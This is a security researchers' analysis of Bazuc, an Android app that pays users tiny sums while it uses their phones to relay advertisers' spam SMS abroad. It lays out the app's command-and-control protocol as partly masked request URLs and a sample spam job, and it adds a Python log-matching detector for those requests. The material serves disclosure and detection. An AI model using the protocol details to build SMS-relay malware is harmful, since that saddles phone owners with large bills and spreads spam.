Clarification - 13/12/13: The analysis below focused on the Bazuc PRO + International version (v2.3), which was active and present on Google Play in late October/early November 2013. Bazuc PRO + International version (v2.3) let users enable international sending of SMS if they consented by clicking in the app's configuration page during registration. Since then Bazuc has released new versions which make it more difficult to allow the sending of internationally destined SMS (users must email Bazuc to enable it) and whose main focus is to enable the sending of SMS nationally.

 

What is Bazuc and what is it doing?

According to the developers' website, Bazuc is ‘a free Android app that will allow you to earn extra money every day by selling us your SMS / Text Message credits that come with your monthly phone plan.’ It's no secret that many mobile subscribers have a prepaid (or even unlimited) number of SMS messages that can be sent from their device, and some people don't use all of their SMS messages each month. That is why the Bazuc developers offer them a small amount of money for each message sent from their device. Users only need to install the Bazuc application. The developers promise to pay $0.001 for each SMS sent from the user's Android device. Sounds like a good deal, right?

Bazuc application

What is it doing actually?

The answer to this question is that Bazuc turns your device into an SMS-sending bot: it sends SMS messages from advertisers to destinations around the world. That is not good for the person who installed the application, for a few reasons. First, a user's unlimited messaging plan normally does not include unlimited international messaging, which is the main target of these Bazuc apps. So even if you are being paid $0.001 per message, you could be shelling out $0.50 per message to your operator to text countries around the world, running up huge bills for the person who owns the phone. Also, in many cases the advertising SMS being sent would be classified as spam, meaning that in the worst-case scenario the mobile operator will disable your mobile phone number because of the large amount of SMS spam being sent from your device.

How is Bazuc doing it?

Upon installation, the app sends an SMS from the device to itself. This verifies that the app (and the device) is able to send SMS. The text of the message is the following:

BAZUC Phone Number Validation

Upon successful receipt of the message, the app sends a registration HTTP request which contains the device phone number, the country code and whether the user has given permission to send to international destinations. In response, Bazuc receives a hashed registration key from the server. The app then replies with this hashed registration key (confirming receipt). After that it sends the configured daily and monthly message sending limits. The default configuration values are:

Daily 3,000 SMS
Monthly 30,000 SMS

The server sends a confirmation response and Bazuc then starts to receive candidate messages, and immediately sends these on.

Do you have any details on Bazuc network communications?

Yes, we do. Bazuc works with the following C&C: 192.241.***.***

Registration.

- Bazuc sends the local phone number, the MCC and whether the user accepts sending to international destinations, in the following format:

http://192.241.***.***/registration?phone_number=[removed]&country_code=+1&international=true

- The server issues a registration key, which may look like this:

b9147e3ea66764******************

- The Bazuc app confirms this key in the following format:

http://192.241.***.***/sms_sent_count?reg_key=b9147e3ea66764******************

- In response, the server initializes a count used to calculate the payment.

- After that, the client uploads its configuration, which contains the limits for sending SMS messages and the account for payment, in the following format:

http://192.241.***.***/user_limit?reg_key=b9147e3ea66764******************&dayLimit=3000&monthLimit=30000&paypal=victim@randomserver.com

Sending SMS messages.

- Bazuc sends a request to the C&C in the following format:

http://192.241.***.***/jobs?reg_key=b9147e3ea66764******************

- The server responds with ‘NA’ if there is no job. If there is a job, the response contains the following data, which is then processed by the Bazuc application:

{"id":632724,"recepient":"+4475********","message":"Hi Jadr your loan app of 1000 for Personal Use has been conditionally approved. Please call 087********. Ref F********","timeStamp":1383xxxxxxxxx,"reg_key":"","status":1,"last_updated":"","user_id":"","error":"","valid":true}

- Bazuc sends this message, sends a confirmation back to the C&C (http://192.241.***.***/job_status?reg_key=b9147e3ea66764******************&status=4&job_id=632723&error=na) and increments the count used for the payment calculation.
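The request formats listed above can be matched in web proxy or gateway logs to find devices running the app. The following is an added example, not code from the original analysis; the log layout, the 192.0.2.10 host, the client addresses and the key values are constructed placeholders.

```python
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Path -> query parameters carried by the requests shown in the article.
BAZUC_ENDPOINTS = {
    "/registration": {"phone_number", "country_code", "international"},
    "/sms_sent_count": {"reg_key"},
    "/user_limit": {"reg_key", "dayLimit", "monthLimit", "paypal"},
    "/jobs": {"reg_key"},
    "/job_status": {"reg_key", "status", "job_id", "error"},
}

def classify_request(url):
    """Return the endpoint path if path and parameter names both match, else None."""
    parts = urlsplit(url)
    required = BAZUC_ENDPOINTS.get(parts.path)
    if required is None:
        return None
    params = parse_qs(parts.query, keep_blank_values=True)
    return parts.path if required.issubset(params) else None

def flag_clients(log_lines, min_stages=2):
    """Map client -> sorted endpoints seen, for clients hitting >= min_stages of them."""
    seen = defaultdict(set)
    for line in log_lines:
        fields = line.split()
        if len(fields) < 3:
            continue  # skip malformed lines
        client, url = fields[1], fields[2]
        stage = classify_request(url)
        if stage:
            seen[client].add(stage)
    return {c: sorted(s) for c, s in seen.items() if len(s) >= min_stages}

# Constructed sample log, one request per line: "<time> <client> <url>".
SAMPLE_LOG = [
    "10:00:01 10.0.0.5 http://192.0.2.10/registration?phone_number=15550100&country_code=%2B1&international=true",
    "10:00:03 10.0.0.5 http://192.0.2.10/sms_sent_count?reg_key=0000placeholder",
    "10:00:04 10.0.0.5 http://192.0.2.10/user_limit?reg_key=0000placeholder&dayLimit=3000&monthLimit=30000&paypal=user@example.com",
    "10:00:09 10.0.0.5 http://192.0.2.10/jobs?reg_key=0000placeholder",
    "10:00:12 10.0.0.5 http://192.0.2.10/job_status?reg_key=0000placeholder&status=4&job_id=1&error=na",
    "10:00:15 10.0.0.7 http://example.com/jobs?page=2",
    "10:00:20 10.0.0.8 http://example.org/registration?email=a@example.org",
]

if __name__ == "__main__":
    for client, stages in flag_clients(SAMPLE_LOG).items():
        print(client, stages)
```

Requiring both the path and the full parameter set, across at least two endpoints per client, keeps unrelated sites that happen to use /jobs or /registration from being flagged.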

Geography and content

Bazuc sends SMS messages with different content to different phone numbers in many countries. Here is the diagram which shows, out of a sample of 54, the most popular destination countries for messages sent by Bazuc.

 

Most popular SMS destinations

The content of these messages may vary from country to country. We’ve seen a lot of messages containing everything from spam payday loan offers sent to UK numbers, to Russian language advertisements sent to Ukrainian numbers.

The Bazuc application was available on Google Play but has been removed. It was downloaded approximately 10 thousand times before it was taken down.

Why shouldn't I install it? It helps me to earn money!

Bazuc won’t help you to earn a lot of money, in fact it could cost you tens of thousands of dollars, euros or pounds and cause your phone to be disconnected. If something is too good to be true, it normally is.

Authors: Denis Maslennikov, Security Analyst; Yicheng Zhou, Security Analyst